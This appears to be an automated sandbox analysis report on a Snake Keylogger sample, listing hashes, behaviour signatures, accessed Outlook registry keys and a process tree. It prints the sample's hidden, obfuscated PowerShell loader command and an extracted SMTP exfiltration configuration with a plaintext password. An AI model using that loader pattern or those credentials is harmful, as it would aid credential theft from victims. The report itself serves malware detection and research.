Analysis
-
max time kernel
147s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-11-2024 20:09
Static task
static1
Behavioral task
behavioral1
Sample
89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Snurre.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Snurre.ps1
Resource
win10v2004-20241007-en
General
-
Target
89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe
-
Size
989KB
-
MD5
2412cbbed6081fd40494028b7ff5e791
-
SHA1
0f404ae35ee0193e07a6cc26391f7560ec103ab9
-
SHA256
89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5
-
SHA512
03ea2096fa8c34f668c301549d6dd7152e24e8d50b9cf5fca63452eecf720bac0e084ddc56a28cf558b2da32c3e5cb7cc036e06eb9735c4a443a7ffe75aeb055
-
SSDEEP
24576:K+63kmIlyh9fgMAC7Nr8xAGuwIm/yWiopvC9wi:K+TOflm/RaWi6Mwi
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
smtp.securemail.pro - Port:
587 - Username:
[email protected] - Password:
jrpM0Y5k - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/4400-250-0x0000000001000000-0x0000000002254000-memory.dmp family_snakekeylogger behavioral2/memory/4400-251-0x0000000001000000-0x0000000001026000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1864 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 24 4400 msiexec.exe 26 4400 msiexec.exe 28 4400 msiexec.exe 30 4400 msiexec.exe 34 4400 msiexec.exe 37 4400 msiexec.exe 39 4400 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 23 drive.google.com 24 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 36 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4400 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1864 powershell.exe 4400 msiexec.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\resources\0409\syntonolydian\statsminister.lnk 89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe File opened for modification C:\Windows\resources\0409\federalt\Telephonists230.Ube 89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe File opened for modification C:\Windows\resources\snagline.sub 89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe 1864 powershell.exe 4400 msiexec.exe 4400 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1864 powershell.exe Token: SeIncreaseQuotaPrivilege 1864 powershell.exe Token: SeSecurityPrivilege 1864 powershell.exe Token: SeTakeOwnershipPrivilege 1864 powershell.exe Token: SeLoadDriverPrivilege 1864 powershell.exe Token: SeSystemProfilePrivilege 1864 powershell.exe Token: SeSystemtimePrivilege 1864 powershell.exe Token: SeProfSingleProcessPrivilege 1864 powershell.exe Token: SeIncBasePriorityPrivilege 1864 powershell.exe Token: SeCreatePagefilePrivilege 1864 powershell.exe Token: SeBackupPrivilege 1864 powershell.exe Token: SeRestorePrivilege 1864 powershell.exe Token: SeShutdownPrivilege 1864 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeSystemEnvironmentPrivilege 1864 powershell.exe Token: SeRemoteShutdownPrivilege 1864 powershell.exe Token: SeUndockPrivilege 1864 powershell.exe Token: SeManageVolumePrivilege 1864 powershell.exe Token: 33 1864 powershell.exe Token: 34 1864 powershell.exe Token: 35 1864 powershell.exe Token: 36 1864 powershell.exe Token: SeDebugPrivilege 4400 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 4440 wrote to memory of 1864 4440 89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe 82 PID 4440 wrote to memory of 1864 4440 89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe 82 PID 4440 wrote to memory of 1864 4440 89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe 82 PID 1864 wrote to memory of 4400 1864 powershell.exe 91 PID 1864 wrote to memory of 4400 1864 powershell.exe 91 PID 1864 wrote to memory of 4400 1864 powershell.exe 91 PID 1864 wrote to memory of 4400 1864 powershell.exe 91 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe"C:\Users\Admin\AppData\Local\Temp\89360a01c95a9aee2ea2af6fe15693baefabe2d31beb3c43fcbc390d73c3bee5.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Parthenocissus=Get-Content -raw 'C:\Users\Admin\AppData\Local\fona\Kvit\Snurre.Cha';$Bekendelsesskriftets=$Parthenocissus.SubString(2518,3);.$Bekendelsesskriftets($Parthenocissus)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4400
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
53KB
MD54222c382a9b09c226558bab62b4eb82c
SHA10ba5c66496bce81da9f06b7d8896fced50ad4e68
SHA256381fce3fd3f4ea5e4c3dc3bce71055559d363e87199a0222a4d81ab93e3f3542
SHA5124d1712e1f76fce09c1d74fca76006f71fa31de804076df35e6ec2acaae736b113e8a264e9263f64cce798ead11f785e89266f762b69d2aa739e233ea14ee2135
-
Filesize
328KB
MD512cf029e7d5bbf17a132fd3ebbab9ef7
SHA125bdb0ded0a981cea3e5d32a1b7cf14e5b6ab5c9
SHA256a2223afe30bde96905d9538473684291db3008eb4f4d452511ba1eb7aa214601
SHA512c39732f50da96c7ab7fc0387cafacca2bb4e6d07d2ee2a93f05b9a409f0e93d3a4a56542e5a49cf630adef7a69c50fd0a3481097bcdd494740a9d1dbc69f3cc5
-
Filesize
898B
MD54afdaa7ed8a5c48b4238efbb07fafad2
SHA10a7edad61dc1cfc5d44da5c2a7f8044c05920620
SHA2566d566d1fe87edfe337fa3b7886a04a5f267de2e65a86f5ce99a666a81559e552
SHA512d40c3ae08bb4ec2b94c5cd6d8511c85d64fda042069d26d1b5f6cdfbe4df5dd5220e91f46693b63cebb12dbafecd06aa06d61ab3c553ae939fae4a665817023f